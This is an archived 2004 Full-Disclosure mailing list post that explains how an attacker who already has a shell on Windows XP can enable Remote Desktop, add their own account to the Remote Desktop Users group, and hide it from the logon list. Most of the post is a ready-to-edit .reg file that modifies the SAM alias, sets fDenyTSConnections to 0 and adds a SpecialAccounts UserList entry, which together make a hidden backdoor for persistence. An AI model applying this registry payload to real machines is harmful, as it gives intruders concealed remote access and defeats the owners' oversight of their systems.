|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-Disclosure] XP Remote Desktop Remote Activation
From: Fixer (fixer907
gmail.com)
Date: Fri Oct 01 2004 - 23:50:45 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
XP Remote Desktop Remote Activation
Information
____________________________________________________________________
Windows XP Professional provides a service called Remote Desktop,
which allows a user to remotely control the desktop as if he or she
were in front of the system locally (ala VNC, pcAnywhere, etc.).
By default, Remote Desktop is shipped with this service turned off and
only the Administrator is allowed access to this service. It is
possible, however, to modify a series of registry keys that may allow
a malicious user who has already gained a command shell to activate
Remote Desktop and add a user they have created for themselves as well
as to hide that user so that it will not show up as a user in the
Remote Desktop user list. The instructions for this are attached.
Additionally, I have listed a sample .reg file of the type that is
discussed in the instructions below.
_____________________________________________________________________
Final Stuff
To the Frozen Chozen...On-On (www.frozen-chozen-h3.org)
On to the exploit.... Fixer
_____________________________________________________________________
.reg file (remember, the xx xx are the values you need to change)
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\0000022B]
"C"=hex:2b,02,00,00,00,00,00,00,b0,00,00,00,02,00,01,00,b0,00,00,00,28,00,00,\
00,00,00,00,00,d8,00,00,00,7a,00,00,00,00,00,00,00,54,01,00,00,1c,00,00,00,\
01,00,00,00,01,00,14,80,90,00,00,00,a0,00,00,00,14,00,00,00,44,00,00,00,02,\
00,30,00,02,00,00,00,02,c0,14,00,13,00,05,01,01,01,00,00,00,00,00,01,00,00,\
00,00,02,c0,14,00,ff,ff,1f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,00,4c,\
00,03,00,00,00,00,00,14,00,0c,00,02,00,01,01,00,00,00,00,00,01,00,00,00,00,\
00,00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,\
00,18,00,1f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,01,02,\
00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,00,00,05,20,00,00,\
00,20,02,00,00,52,00,65,00,6d,00,6f,00,74,00,65,00,20,00,44,00,65,00,73,00,\
6b,00,74,00,6f,00,70,00,20,00,55,00,73,00,65,00,72,00,73,00,4d,00,65,00,6d,\
00,62,00,65,00,72,00,73,00,20,00,69,00,6e,00,20,00,74,00,68,00,69,00,73,00,\
20,00,67,00,72,00,6f,00,75,00,70,00,20,00,61,00,72,00,65,00,20,00,67,00,72,\
00,61,00,6e,00,74,00,65,00,64,00,20,00,74,00,68,00,65,00,20,00,72,00,69,00,\
67,00,68,00,74,00,20,00,74,00,6f,00,20,00,6c,00,6f,00,67,00,6f,00,6e,00,20,\
00,72,00,65,00,6d,00,6f,00,74,00,65,00,6c,00,79,00,00,00,01,05,00,00,00,00,\
00,05,15,00,00,00,d8,52,bb,80,c4,9d,6f,b9,b9,67,c7,13,xx,xx,00,00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"lus3r"=dword:00000000
(obviously change "lus3r" to the name of the account you created)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- application/msword attachment: Remote_Desktop.doc
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]